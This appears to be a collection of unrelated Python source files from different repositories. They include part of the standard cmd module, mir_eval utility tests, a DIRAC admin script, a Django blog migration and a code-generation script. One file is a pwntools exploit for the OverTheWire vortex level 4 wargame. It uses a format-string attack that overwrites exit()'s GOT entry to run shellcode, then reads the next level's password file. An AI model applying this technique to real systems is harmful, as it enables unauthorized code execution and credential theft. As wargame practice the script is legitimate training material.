        when no command can be parsed out.
        """
        line = line.strip()
        if not line:
            return None, None, line
        elif line[0] == '?':
            line = 'help ' + line[1:]
        elif line[0] == '!':
            # '!' is only special when the subclass defines do_shell.
            if hasattr(self, 'do_shell'):
                line = 'shell ' + line[1:]
            else:
                return None, None, line
        # The command word is the longest prefix of identchars characters.
        i, n = 0, len(line)
        while i < n and line[i] in self.identchars: i = i+1
        cmd, arg = line[:i], line[i:].strip()
        return cmd, arg, line
    def onecmd(self, line):
        """Interpret the argument as though it had been typed in response
        to the prompt.
        This may be overridden, but should not normally need to be;
        see the precmd() and postcmd() methods for useful execution hooks.
        The return value is a flag indicating whether interpretation of
        commands by the interpreter should stop.
        """
        cmd, arg, line = self.parseline(line)
        if not line:
            return self.emptyline()
        if cmd is None:
            return self.default(line)
        self.lastcmd = line
        if cmd == '':
            return self.default(line)
        else:
            # Dispatch 'foo' to self.do_foo(arg), falling back to default().
            try:
                func = getattr(self, 'do_' + cmd)
            except AttributeError:
                return self.default(line)
            return func(arg)
    def emptyline(self):
        """Called when an empty line is entered in response to the prompt.
        If this method is not overridden, it repeats the last nonempty
        command entered.
        """
        if self.lastcmd:
            return self.onecmd(self.lastcmd)
    def default(self, line):
        """Called on an input line when the command prefix is not recognized.
        If this method is not overridden, it prints an error message and
        returns.
        """
        print '*** Unknown syntax:', line
    def completedefault(self, *ignored):
        """Method called to complete an input line when no command-specific
        complete_*() method is available.
        By default, it returns an empty list.
        """
        return []
    def completenames(self, text, *ignored):
        """Return the command names (sans 'do_' prefix) starting with text."""
        dotext = 'do_'+text
        return [a[3:] for a in self.get_names() if a.startswith(dotext)]
    def complete(self, text, state):
        """Return the next possible completion for 'text'.
        If a command has not been entered, then complete against command list.
        Otherwise try to call complete_<command> to get list of completions.
        """
        if state == 0:
            # First call for this text: compute the full match list once;
            # later calls just index into self.completion_matches.
            import readline
            origline = readline.get_line_buffer()
            line = origline.lstrip()
            stripped = len(origline) - len(line)
            begidx = readline.get_begidx() - stripped
            endidx = readline.get_endidx() - stripped
            if begidx>0:
                # Completing an argument: delegate to complete_<command>.
                cmd, args, foo = self.parseline(line)
                if cmd == '':
                    compfunc = self.completedefault
                else:
                    try:
                        compfunc = getattr(self, 'complete_' + cmd)
                    except AttributeError:
                        compfunc = self.completedefault
            else:
                # Completing the command word itself.
                compfunc = self.completenames
            self.completion_matches = compfunc(text, line, begidx, endidx)
        try:
            return self.completion_matches[state]
        except IndexError:
            return None
    def get_names(self):
        # Inheritance says we have to look in class and
        # base classes; order is not important.
        names = []
        classes = [self.__class__]
        while classes:
            aclass = classes[0]
            if aclass.__bases__:
                classes = classes + list(aclass.__bases__)
            names = names + dir(aclass)
            del classes[0]
        return names
    def complete_help(self, *args):
        return self.completenames(*args)
    def do_help(self, arg):
        """List available commands, or show help for one topic/command."""
        if arg:
            # XXX check arg syntax
            try:
                func = getattr(self, 'help_' + arg)
            except:
                # No help_<arg> method: fall back to do_<arg>'s docstring.
                try:
                    doc=getattr(self, 'do_' + arg).__doc__
                    if doc:
                        print doc
                        return
                except:
                    pass
                print self.nohelp % (arg,)
                return
            func()
        else:
            # No argument: build the three topic lists (documented commands,
            # misc help topics, undocumented commands) and print them.
            names = self.get_names()
            cmds_doc = []
            cmds_undoc = []
            help = {}
            for name in names:
                if name[:5] == 'help_':
                    help[name[5:]]=1
            names.sort()
            # There can be duplicates if routines overridden
            prevname = ''
            for name in names:
                if name[:3] == 'do_':
                    if name == prevname:
                        continue
                    prevname = name
                    cmd=name[3:]
                    if help.has_key(cmd):
                        cmds_doc.append(cmd)
                        del help[cmd]
                    elif getattr(self, name).__doc__:
                        cmds_doc.append(cmd)
                    else:
                        cmds_undoc.append(cmd)
            print self.doc_leader
            self.print_topics(self.doc_header,   cmds_doc,   15,80)
            self.print_topics(self.misc_header,  help.keys(),15,80)
            self.print_topics(self.undoc_header, cmds_undoc, 15,80)
    def print_topics(self, header, cmds, cmdlen, maxcol):
        """Print a ruler-underlined header and the topics in columns."""
        if cmds:
            print header
            if self.ruler:
                print self.ruler * len(header)
            (cmds_per_line,junk)=divmod(maxcol,cmdlen)
            col=cmds_per_line
            for cmd in cmds:
                if col==0: print
                # Backticks are Python 2 repr(); pads each name to cmdlen.
                print (("%-"+`cmdlen`+"s") % cmd),
                col = (col+1) % cmds_per_line
            print "\n"
| remybaranx/qtaste | tools/jython/lib/Lib/cmd.py | Python | gpl-3.0 | 12,108 |
''' Unit tests for utils
'''
import collections
import numpy as np
import nose.tools
import mir_eval
from mir_eval import util
def test_interpolate_intervals():
    """Interpolation over contiguous intervals handles interior points,
    boundary points, and out-of-range queries (which get the fill value).
    """
    labels = ['a', 'b', 'c']
    intervals = np.array([[0.0, 1.0], [1.0, 2.0], [2.0, 3.0]])
    queries = [-1.0, 0.1, 0.9, 1.0, 2.3, 4.0]
    result = util.interpolate_intervals(intervals, labels, queries, 'N')
    assert result == ['N', 'a', 'a', 'b', 'c', 'N']
def test_interpolate_intervals_gap():
    """Sample times falling in the gaps between intervals get the fill value."""
    labels = ['a', 'b', 'c']
    intervals = np.array([[0.5, 1.0], [1.5, 2.0], [2.5, 3.0]])
    queries = [0.0, 0.75, 1.25, 1.75, 2.25, 2.75, 3.5]
    result = util.interpolate_intervals(intervals, labels, queries, 'N')
    assert result == ['N', 'a', 'N', 'b', 'N', 'c', 'N']
@nose.tools.raises(ValueError)
def test_interpolate_intervals_badtime():
    """Check that interpolate_intervals throws an exception if
    input is unordered.
    """
    labels = list('abc')
    intervals = np.array([(n, n + 1.0) for n in range(len(labels))])
    # 0.8 following 0.9 makes the sample times non-monotonic.
    time_points = [-1.0, 0.1, 0.9, 0.8, 2.3, 4.0]
    mir_eval.util.interpolate_intervals(intervals, labels, time_points)
def test_intervals_to_samples():
    """Check that an interval set is sampled properly, with boundaries
    conditions and out-of-range values.
    """
    labels = list('abc')
    intervals = np.array([(n, n + 1.0) for n in range(len(labels))])
    expected_times = [0.0, 0.5, 1.0, 1.5, 2.0, 2.5]
    expected_labels = ['a', 'a', 'b', 'b', 'c', 'c']
    result = util.intervals_to_samples(
        intervals, labels, offset=0, sample_size=0.5, fill_value='N')
    assert result[0] == expected_times
    assert result[1] == expected_labels
    # With a 0.25 offset the sample grid shifts, but every sample still
    # falls inside the same intervals, so the labels are unchanged.
    expected_times = [0.25, 0.75, 1.25, 1.75, 2.25, 2.75]
    expected_labels = ['a', 'a', 'b', 'b', 'c', 'c']
    result = util.intervals_to_samples(
        intervals, labels, offset=0.25, sample_size=0.5, fill_value='N')
    assert result[0] == expected_times
    assert result[1] == expected_labels
def test_intersect_files():
    """Check that two non-identical file lists yield correct results."""
    ref_files = ['/a/b/abc.lab', '/c/d/123.lab', '/e/f/xyz.lab']
    est_files = ['/g/h/xyz.npy', '/i/j/123.txt', '/k/l/456.lab']
    # Files are paired on basename (ignoring extension and directory),
    # returned in the order of the matches found.
    sub_ref, sub_est = util.intersect_files(ref_files, est_files)
    assert sub_ref == ['/e/f/xyz.lab', '/c/d/123.lab']
    assert sub_est == ['/g/h/xyz.npy', '/i/j/123.txt']
    # Disjoint singleton lists share nothing.
    sub_ref, sub_est = util.intersect_files(ref_files[:1], est_files[:1])
    assert sub_ref == []
    assert sub_est == []
def test_merge_labeled_intervals():
    """Check that two labeled interval sequences merge correctly.
    """
    # Two segmentations of the same [0, 6.409] span, with slightly
    # different boundary placements.
    x_intvs = np.array([
        [0.0, 0.44],
        [0.44, 2.537],
        [2.537, 4.511],
        [4.511, 6.409]])
    x_labels = ['A', 'B', 'C', 'D']
    y_intvs = np.array([
        [0.0, 0.464],
        [0.464, 2.415],
        [2.415, 4.737],
        [4.737, 6.409]])
    y_labels = [0, 1, 2, 3]
    # The merge should contain the union of all boundaries, with each
    # sub-interval inheriting the label of its parent in each sequence.
    expected_intvs = [
        [0.0, 0.44],
        [0.44, 0.464],
        [0.464, 2.415],
        [2.415, 2.537],
        [2.537, 4.511],
        [4.511, 4.737],
        [4.737, 6.409]]
    expected_x_labels = ['A', 'B', 'B', 'B', 'C', 'D', 'D']
    expected_y_labels = [0, 0, 1, 2, 2, 2, 3]
    new_intvs, new_x_labels, new_y_labels = util.merge_labeled_intervals(
        x_intvs, x_labels, y_intvs, y_labels)
    assert new_x_labels == expected_x_labels
    assert new_y_labels == expected_y_labels
    assert new_intvs.tolist() == expected_intvs
    # Check that invalid inputs raise a ValueError
    # (mismatched final end times make the sequences un-mergeable)
    y_intvs[-1, -1] = 10.0
    nose.tools.assert_raises(ValueError, util.merge_labeled_intervals, x_intvs,
                             x_labels, y_intvs, y_labels)
def test_boundaries_to_intervals():
    """Check conversion of a boundary sequence into adjacent intervals."""
    bounds = np.arange(10)
    # Consecutive boundary pairs become [start, end] rows.
    expected = np.array([np.arange(9), np.arange(1, 10)]).T
    computed = mir_eval.util.boundaries_to_intervals(bounds)
    assert np.all(computed == expected)
def test_adjust_events():
    """Check padding and trimming of event sequences by adjust_events."""
    # Test appending at the end
    events = np.arange(1, 11)
    labels = [str(n) for n in range(10)]
    new_e, new_l = mir_eval.util.adjust_events(events, labels, 0.0, 11.)
    # Expanding the range to [0, 11] pads synthetic boundary events
    # (labeled __T_MIN/__T_MAX) around the untouched originals.
    assert new_e[0] == 0.
    assert new_l[0] == '__T_MIN'
    assert new_e[-1] == 11.
    assert new_l[-1] == '__T_MAX'
    assert np.all(new_e[1:-1] == events)
    assert new_l[1:-1] == labels
    # Test trimming
    new_e, new_l = mir_eval.util.adjust_events(events, labels, 0.0, 9.)
    # Shrinking t_max to 9 should drop the last event (at t=10).
    assert new_e[0] == 0.
    assert new_l[0] == '__T_MIN'
    assert new_e[-1] == 9.
    assert np.all(new_e[1:] == events[:-1])
    assert new_l[1:] == labels[:-1]
def test_bipartite_match():
    """Check maximum bipartite matching on a layered worst-case graph."""
    # This test constructs a graph as follows:
    #   v9 -- (u0)
    #   v8 -- (u0, u1)
    #   v7 -- (u0, u1, u2)
    #   ...
    #   v0 -- (u0, u1, ..., u9)
    #
    # This structure and ordering of this graph should force Hopcroft-Karp to
    # hit each algorithm/layering phase
    #
    G = collections.defaultdict(list)
    u_set = ['u{:d}'.format(_) for _ in range(10)]
    v_set = ['v{:d}'.format(_) for _ in range(len(u_set)+1)]
    for i, u in enumerate(u_set):
        for v in v_set[:-i-1]:
            G[v].append(u)
    matching = util._bipartite_match(G)
    # Make sure that each u vertex is matched
    nose.tools.eq_(len(matching), len(u_set))
    # Make sure that there are no duplicate keys
    lhs = set([k for k in matching])
    rhs = set([matching[k] for k in matching])
    nose.tools.eq_(len(matching), len(lhs))
    nose.tools.eq_(len(matching), len(rhs))
    # Finally, make sure that all detected edges are present in G
    # (the matching dict may be keyed from either side of the graph)
    for k in matching:
        v = matching[k]
        assert v in G[k] or k in G[v]
def test_outer_distance_mod_n():
    """Check the pairwise outer distance computed modulo n.

    The second case shifts `ref` by 12 and expects identical distances,
    so the default modulus here is evidently 12.
    """
    ref = [1., 2., 3.]
    est = [1.1, 6., 1.9, 5., 10.]
    # expected[i, j] = circular distance between ref[i] and est[j].
    expected = np.array([
        [0.1, 5., 0.9, 4., 3.],
        [0.9, 4., 0.1, 3., 4.],
        [1.9, 3., 1.1, 2., 5.]])
    actual = mir_eval.util._outer_distance_mod_n(ref, est)
    assert np.allclose(actual, expected)
    # Shifting ref by the modulus must leave every distance unchanged.
    ref = [13., 14., 15.]
    est = [1.1, 6., 1.9, 5., 10.]
    expected = np.array([
        [0.1, 5., 0.9, 4., 3.],
        [0.9, 4., 0.1, 3., 4.],
        [1.9, 3., 1.1, 2., 5.]])
    actual = mir_eval.util._outer_distance_mod_n(ref, est)
    assert np.allclose(actual, expected)
def test_match_events():
    """Check event matching within a 0.5 s tolerance window."""
    ref = [1., 2., 3.]
    est = [1.1, 6., 1.9, 5., 10.]
    # Only ref[0]~est[0] and ref[1]~est[2] fall within the window.
    expected = [(0, 0), (1, 2)]
    actual = mir_eval.util.match_events(ref, est, 0.5)
    assert actual == expected
    # With the mod-n distance, ref[3]=11.9 also matches est[5]=0.
    # across the modular wrap-around.
    ref = [1., 2., 3., 11.9]
    est = [1.1, 6., 1.9, 5., 10., 0.]
    expected = [(0, 0), (1, 2), (3, 5)]
    actual = mir_eval.util.match_events(
        ref, est, 0.5, distance=mir_eval.util._outer_distance_mod_n)
    assert actual == expected
def test_fast_hit_windows():
    """Check the fast hit-window search against a brute-force np.where."""
    ref = [1., 2., 3.]
    est = [1.1, 6., 1.9, 5., 10.]
    fast_ref, fast_est = mir_eval.util._fast_hit_windows(ref, est, 0.5)
    # Brute force: indices of all |ref - est| pairs within the window.
    slow_ref, slow_est = np.where(np.abs(np.subtract.outer(ref, est)) <= 0.5)
    assert np.all(fast_ref == slow_ref)
    assert np.all(fast_est == slow_est)
def test_validate_intervals():
    """Check that validate_intervals rejects malformed interval arrays."""
    # Test for ValueError when interval shape is invalid
    nose.tools.assert_raises(
        ValueError, mir_eval.util.validate_intervals,
        np.array([[1.], [2.5], [5.]]))
    # Test for ValueError when times are negative
    nose.tools.assert_raises(
        ValueError, mir_eval.util.validate_intervals,
        np.array([[1., -2.], [2.5, 3.], [5., 6.]]))
    # Test for ValueError when duration is zero
    nose.tools.assert_raises(
        ValueError, mir_eval.util.validate_intervals,
        np.array([[1., 2.], [2.5, 2.5], [5., 6.]]))
    # Test for ValueError when duration is negative
    nose.tools.assert_raises(
        ValueError, mir_eval.util.validate_intervals,
        np.array([[1., 2.], [2.5, 1.5], [5., 6.]]))
def test_validate_events():
    """Check that validate_events rejects malformed event arrays."""
    # Test for ValueError when max_time is violated
    nose.tools.assert_raises(
        ValueError, mir_eval.util.validate_events, np.array([100., 100000.]))
    # Test for ValueError when events aren't 1-d arrays
    nose.tools.assert_raises(
        ValueError, mir_eval.util.validate_events,
        np.array([[1., 2.], [3., 4.]]))
    # Test for ValueError when event times are not increasing
    nose.tools.assert_raises(
        ValueError, mir_eval.util.validate_events,
        np.array([1., 2., 5., 3.]))
def test_validate_frequencies():
    """Check that validate_frequencies rejects out-of-range or malformed
    frequency arrays, with and without allow_negatives."""
    # Test for ValueError when max_freq is violated
    nose.tools.assert_raises(
        ValueError, mir_eval.util.validate_frequencies,
        np.array([100., 100000.]), 5000., 20.)
    # Test for ValueError when min_freq is violated
    nose.tools.assert_raises(
        ValueError, mir_eval.util.validate_frequencies,
        np.array([2., 200.]), 5000., 20.)
    # Test for ValueError when events aren't 1-d arrays
    nose.tools.assert_raises(
        ValueError, mir_eval.util.validate_frequencies,
        np.array([[100., 200.], [300., 400.]]), 5000., 20.)
    # Test for ValueError when allow_negatives is false and negative values
    # are passed
    nose.tools.assert_raises(
        ValueError, mir_eval.util.validate_frequencies,
        np.array([[-100., 200.], [300., 400.]]), 5000., 20.,
        allow_negatives=False)
    # Test for ValueError when max_freq is violated and allow_negatives=True
    nose.tools.assert_raises(
        ValueError, mir_eval.util.validate_frequencies,
        np.array([100., -100000.]), 5000., 20., allow_negatives=True)
    # Test for ValueError when min_freq is violated and allow_negatives=True
    nose.tools.assert_raises(
        ValueError, mir_eval.util.validate_frequencies,
        np.array([-2., 200.]), 5000., 20., allow_negatives=True)
def test_has_kwargs():
    """Check detection of **kwargs in function signatures (nose generator)."""
    def __test(target, f):
        assert target == mir_eval.util.has_kwargs(f)
    def f1(_):
        return None
    def f2(_=5):
        return None
    def f3(*_):
        return None
    def f4(_, **kw):
        return None
    def f5(_=5, **kw):
        return None
    # Only f4 and f5 accept arbitrary keyword arguments; positional,
    # defaulted, and *args-only signatures must report False.
    yield __test, False, f1
    yield __test, False, f2
    yield __test, False, f3
    yield __test, True, f4
    yield __test, True, f5
def test_sort_labeled_intervals():
    """Check interval sorting with and without labels (nose generator)."""
    def __test_labeled(x, labels, x_true, lab_true):
        xs, ls = mir_eval.util.sort_labeled_intervals(x, labels)
        assert np.allclose(xs, x_true)
        nose.tools.eq_(ls, lab_true)
    def __test(x, x_true):
        xs = mir_eval.util.sort_labeled_intervals(x)
        assert np.allclose(xs, x_true)
    # x1 is out of order; labels must be permuted along with the rows.
    x1 = np.asarray([[10, 20], [0, 10]])
    x1_true = np.asarray([[0, 10], [10, 20]])
    labels = ['a', 'b']
    labels_true = ['b', 'a']
    yield __test_labeled, x1, labels, x1_true, labels_true
    yield __test, x1, x1_true
    # Already-sorted input should pass through unchanged.
    yield __test_labeled, x1_true, labels_true, x1_true, labels_true
    yield __test, x1_true, x1_true
| bmcfee/mir_eval | tests/test_util.py | Python | mit | 11,123 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Exploit for OverTheWire "vortex" level 4: a format-string vulnerability,
# driven over SSH with a controlled environment and argc == 0.
from pwn import *
from libformatstr import FormatStr
#from funcy import silent
# Target is a 32-bit Linux binary; 2 s default timeout for remote I/O.
context(arch='i386',os='linux',timeout=2)
level = 4
host = 'vortex.labs.overthewire.org'
user = 'vortex%i' % level
chal = 'vortex%i' % level
# SSH password is supplied on the command line via pwntools' args.
password = args['PASSWORD']
passfile = '/etc/vortex_pass/vortex%i' % (level+1)
binary = '/vortex/%s' % chal
shell = ssh(host=host, user=user, password=password)
# Download the binary for loading ELF information
if not os.path.exists(chal):
    shell.download_file(binary)
    os.chmod(chal, 0755)
#
# Upload our Python script for executing with a controlled
# environment and argc==0.
#
shell.set_working_directory()
shell.upload_file('exec.py')
#
# Helper routine to execute the above script,
# with ASLR disabled, and get the output.
#
def execute_with_env(format, padding, binary=binary):
    """Run `binary` on the remote host through the uploaded exec.py helper,
    passing `format` (bash $'...'-quoted via repr) and `padding` to control
    the environment layout.  Returns the pwntools process handle."""
    command = "python exec.py $%(format)r %(padding)r %(binary)r" % locals()
    return shell.run(command)
#
# Manually discover the offset of the argument we're looking for
#
# Dump the stack, until our format string is properly
# aligned on a 4-byte boundary. Use '%x' to dump the
# stack to see this, and adjust the alignment with the
# environment variable that follows our format string.
#
offset = 0
padding = -1
stack_dump = '%4x\n'*0x100
result = ''
XXXX = enhex('XXXX')
# Increase padding until the 'XXXX' marker lands 4-byte aligned and
# shows up verbatim in the %x dump; its line index is the argument offset.
while not offset:
    padding += 1
    result = execute_with_env(stack_dump, padding).recvall()
    lines = result.splitlines()
    if XXXX in lines:
        offset = lines.index(XXXX)
log.info("Need padding: %s" % padding)
log.info("Found offset: %s" % offset)
# We can execute on the stack.
# In order to do that, we need to know where on the stack our
# buffer is in absolute terms.
#
# A small helper program is uploaded and compiled, which prints
# out relevant addresses.
shell.upload_file('leak.c')
shell.gcc('-m32 leak.c -o leak')
result = execute_with_env(stack_dump, padding, './leak').recvall().strip()
log.info("Stack leaker says:\n%s" % result)
# NOTE: executes Python emitted by our own leak helper; trusted here
# because we authored leak.c, but do not reuse this pattern elsewhere.
exec(result) # creates 'sc'
# Adjust the offset to account for arg0 being the format
# string, and the 'XXXX' that we want to skip over.
# And then one more for good measure, which I don't understand.
offset += 2
# Now that we know the offsets on the stack, we can generate
# our format string exploit.
#
# Note that start_len=2 because of 'c=' that is printed.
e = ELF(chal)
f = FormatStr()
# Overwrite exit()'s GOT entry with the leaked shellcode address.
f[e.got['exit']]=sc
payload = f.payload(offset, start_len= len('c=XXXX'))
# Pad to the same length as the stack dump so alignment is unchanged.
payload += cyclic(len(stack_dump) - len(payload))
log.info("Payload created, sending exploit")
remote = execute_with_env(payload, padding)
remote.clean(2)
remote.sendline('id')
log.success(remote.recv().strip())
remote.sendline('cat %s' % passfile)
password = remote.recv().strip()
log.success('Password: %s' % password)
print password
| sigma-random/pwntools-write-ups | wargames/overthewire-vortex/level4/win.py | Python | mit | 2,851 |
#!/usr/bin/env python
"""
Stop a DIRAC component (service or agent) using the runsvctrl utility
"""
from __future__ import print_function
from DIRAC.Core.Base import Script
# Local administrative action: do not contact the Configuration Service.
Script.disableCS()
Script.setUsageMessage( '\n'.join( ['Stop DIRAC component using runsvctrl utility',
                                    'Usage:',
                                    '  %s [option|cfgfile] ... [system [service|agent]]' % Script.scriptName,
                                    'Arguments:',
                                    '  system:        Name of the system for the component (default *: all)',
                                    '  service|agent: Name of the particular component (default *: all)' ] ) )
Script.parseCommandLine()
args = Script.getPositionalArgs()
from DIRAC.FrameworkSystem.Client.ComponentInstaller import gComponentInstaller
__RCSID__ = "$Id$"
# At most two positional arguments are accepted: system and component.
if len( args ) > 2:
  Script.showHelp()
  exit( -1 )
# '*' selects all systems/components when arguments are omitted.
system = '*'
component = '*'
if len( args ) > 0:
  system = args[0]
if system != '*':
  if len( args ) > 1:
    component = args[1]
#
#
gComponentInstaller.exitOnError = True
#
# 'd' is the runsvctrl "down" command, i.e. stop the selected component(s).
result = gComponentInstaller.runsvctrlComponent( system, component, 'd' )
if not result['OK']:
  print('ERROR:', result['Message'])
  exit( -1 )
gComponentInstaller.printStartupStatus( result['Value'] )
| fstagni/DIRAC | FrameworkSystem/scripts/dirac-stop-component.py | Python | gpl-3.0 | 1,302 |
from blogging.tag_lib import parse_content
from blogging.models import BlogContent, BlogParent, BlogContentType
import json
import os
def convert_tags(blog, tag_name, fd):
    """Extract the content of `tag_name` from `blog`, log the conversion
    to `fd`, and store the result (plus a pid count) as JSON in blog.data.

    Returns True when the tag produced content, False otherwise.  The
    caller is responsible for saving `blog`.
    """
    content = parse_content(blog, {'name': tag_name})
    if len(content) == 0:
        return False
    fd.write("\nConverting " + blog.title + "\n")
    payload = {'content': content}
    # The pid count lives in its own tag; default to '0' when absent.
    pid_count = parse_content(blog, {'name': 'pid_count_tag'})
    payload['pid_count'] = pid_count if len(pid_count) > 0 else '0'
    fd.write(json.dumps(payload) + "\n\n")
    blog.data = json.dumps(payload)
    return True
def migrate():
blogs = BlogParent.objects.all()
content_type = BlogContentType.objects.get(content_type='DefaultSection')
form_filename = os.path.abspath(os.path.dirname(__file__))+"/custom/"+"migrate_sections.txt"
fd = os.fdopen(os.open(form_filename,os.O_CREAT| os.O_RDWR , 0555),'w')
for blog in blogs:
if(convert_tags(blog, 'Body', fd)):
blog.content_type = content_type
blog.save()
continue
elif (convert_tags(blog, 'content', fd)):
blog.content_type = content_type
blog.save()
continue
elif(convert_tags(blog, 'Content', fd)):
blog.content_type = content_type
blog.save()
continue
elif(convert_tags(blog, 'Summary', fd)):
blog.content_type = content_type
blog.save()
continue
elif(convert_tags(blog, 'Preface', fd)):
blog.content_type = content_type
blog.save()
continue
else:
print "NO TAGs FOUND in " + blog.title
tmp = {}
tmp['content'] = blog.data
tmp['pid_count'] = '0'
fd.write("\nAdding "+ blog.title + "\n")
fd.write(json.dumps(tmp) + "\n\n")
blog.data = json.dumps(tmp)
blog.content_type = content_type
print " Going to save " , blog , blog.content_type
blog.save()
fd.close()
# Allow running this migration directly as a script.
if __name__ == "__main__":
    migrate()
| PirateLearner/pi | PirateLearner/blogging/db_migrate.py | Python | gpl-2.0 | 2,332 |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This script is used to synthesize generated parts of this library."""
import synthtool as s
import synthtool.gcp as gcp
import synthtool.languages.java as java
gapic = gcp.GAPICGenerator()
service = 'texttospeech'
versions = ['v1','v1beta1']
config_pattern = '/google/cloud/texttospeech/artman_texttospeech_{version}.yaml'
for version in versions:
library = gapic.java_library(
service=service,
version=version,
config_path=config_pattern.format(version=version),
artman_output_name='')
s.copy(library / f'gapic-google-cloud-{service}-{version}/src', 'src')
s.copy(library / f'grpc-google-cloud-{service}-{version}/src', f'../../google-api-grpc/grpc-google-cloud-{service}-{version}/src')
s.copy(library / f'proto-google-cloud-{service}-{version}/src', f'../../google-api-grpc/proto-google-cloud-{service}-{version}/src')
java.format_code('./src')
java.format_code(f'../../google-api-grpc/grpc-google-cloud-{service}-{version}/src')
java.format_code(f'../../google-api-grpc/proto-google-cloud-{service}-{version}/src')
| vam-google/google-cloud-java | google-cloud-clients/google-cloud-texttospeech/synth.py | Python | apache-2.0 | 1,663 |
# -*- coding: utf-8 -*-
"""Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, 2017, 2018, 2019, 2020 Caleb Bell
<Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
This module contains basic fluid mechanics and engineering calculations which
have been found useful by the author. The main functionality is calculating
dimensionless numbers, interconverting different forms of loss coefficients,
and converting temperature units.
For reporting bugs, adding feature requests, or submitting pull requests,
please use the `GitHub issue tracker <https://github.com/CalebBell/fluids/>`_
or contact the author at Caleb.Andrew.Bell@gmail.com.
.. contents:: :local:
Dimensionless Numbers
---------------------
.. autofunction:: Archimedes
.. autofunction:: Bejan_L
.. autofunction:: Bejan_p
.. autofunction:: Biot
.. autofunction:: Boiling
.. autofunction:: Bond
.. autofunction:: Capillary
.. autofunction:: Cavitation
.. autofunction:: Confinement
.. autofunction:: Dean
.. autofunction:: Drag
.. autofunction:: Eckert
.. autofunction:: Euler
.. autofunction:: Fourier_heat
.. autofunction:: Fourier_mass
.. autofunction:: Froude
.. autofunction:: Froude_densimetric
.. autofunction:: Graetz_heat
.. autofunction:: Grashof
.. autofunction:: Hagen
.. autofunction:: Jakob
.. autofunction:: Knudsen
.. autofunction:: Lewis
.. autofunction:: Mach
.. autofunction:: Morton
.. autofunction:: Nusselt
.. autofunction:: Ohnesorge
.. autofunction:: Peclet_heat
.. autofunction:: Peclet_mass
.. autofunction:: Power_number
.. autofunction:: Prandtl
.. autofunction:: Rayleigh
.. autofunction:: relative_roughness
.. autofunction:: Reynolds
.. autofunction:: Schmidt
.. autofunction:: Sherwood
.. autofunction:: Stanton
.. autofunction:: Stokes_number
.. autofunction:: Strouhal
.. autofunction:: Suratman
.. autofunction:: Weber
Loss Coefficient Converters
---------------------------
.. autofunction:: K_from_f
.. autofunction:: K_from_L_equiv
.. autofunction:: L_equiv_from_K
.. autofunction:: L_from_K
.. autofunction:: dP_from_K
.. autofunction:: head_from_K
.. autofunction:: head_from_P
.. autofunction:: f_from_K
.. autofunction:: P_from_head
Temperature Conversions
-----------------------
These functions used to be part of SciPy, but were removed in favor
of a slower function `convert_temperature` which removes code duplication but
doesn't have the same convenience or easy to remember signature.
.. autofunction:: C2K
.. autofunction:: K2C
.. autofunction:: F2C
.. autofunction:: C2F
.. autofunction:: F2K
.. autofunction:: K2F
.. autofunction:: C2R
.. autofunction:: K2R
.. autofunction:: F2R
.. autofunction:: R2C
.. autofunction:: R2K
.. autofunction:: R2F
Miscellaneous Functions
-----------------------
.. autofunction:: thermal_diffusivity
.. autofunction:: c_ideal_gas
.. autofunction:: nu_mu_converter
.. autofunction:: gravity
"""
from __future__ import division
'''
Additional copyright:
The functions C2K, K2C, F2C, C2F, F2K, K2F, C2R, K2R, F2R, R2C, R2K, R2F
were deprecated from scipy but are still wanted by fluids
Taken from scipy/constants/constants.py as in commit
https://github.com/scipy/scipy/commit/4b7d325cd50e8828b06d628e69426a18283dc5b5
Also from https://github.com/scipy/scipy/pull/5292
by Gillu13 (Gilles Aouizerate)
They are copyright individual contributors to SciPy, under the BSD 3-Clause
The license of scipy is as follows:
Copyright (c) 2001-2002 Enthought, Inc. 2003-2019, SciPy Developers.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
